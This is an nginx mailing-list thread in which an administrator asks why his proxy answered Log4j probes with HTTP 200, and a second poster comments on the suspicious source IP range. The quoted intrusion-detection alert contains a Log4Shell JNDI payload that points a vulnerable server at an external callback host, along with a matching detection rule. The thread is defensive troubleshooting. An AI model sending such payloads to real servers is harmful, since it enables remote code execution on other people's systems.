Thank you very much for your reply. I really appreciated it. I’ll wait for the gurus’ final feedback too.
Mauro

> On 29 Dec 2021, at 18:03, lists <li...@lazygranch.com> wrote:
>
> That IP space is certified shady. I detect the occasional hack from them. See
>
> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
>
> and
>
> https://wirelessdataspco.org/faq.php
>
> These wireless companies will do anything for money, including leasing their
> IP space.
>
> I don't block the IP space since it could be from normal users. Plus plenty
> of hacking comes from actual wireless providers' customers. But I am appalled
> that highly profitable wireless providers lease IPv4 space to hackers for what is
> pocket change for them.
>
> I will leave it up to the gurus to parse the log.
>
> Original Message
>
> From: mauro.trid...@cmcc.it
> Sent: December 29, 2021 6:55 AM
> To: nginx@nginx.org
> Reply-to: nginx@nginx.org
> Subject: Help request about Log4j attack attempts and NGINX logs meaning
>
> Dear Users,
>
> I have an old instance of NGINX (v.1.10.1) running as a proxy server on a
> dedicated hardware platform.
> Since the proxy service is reachable from the internet, it is constantly exposed
> to cyber attacks.
> In my particular case, it is attacked by a lot of Log4j attack attempts from
> several malicious IPs.
>
> At this moment, a host intrusion detection system (HIDS) is running and is
> protecting the NGINX server: it seems it is blocking every malicious attack
> attempt.
> Anyway, in the last attack mail notification sent by the HIDS, I noticed
> that the NGINX server response was “HTTP/1.1 200” and I’m very worried about
> it.
> Log4j and Java packages are NOT installed on the NGINX server, and none of the
> servers behind the proxy are using Log4j.
>
> Could you please help me to understand the reason why the NGINX server answer
> was “HTTP/1.1 200”!?
>
> You can see below the mail notification I received:
>
> Attack Notification.
> 2021 Dec 28 20:45:59
>
> Received From: “hidden_NGINX_server_IP”->/var/log/nginx/access.log
> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
> Src IP: 166.137.252.110
> Portion of the log(s):
>
> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"
>
> Thank you in advance,
> Mauro
> _______________________________________________
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx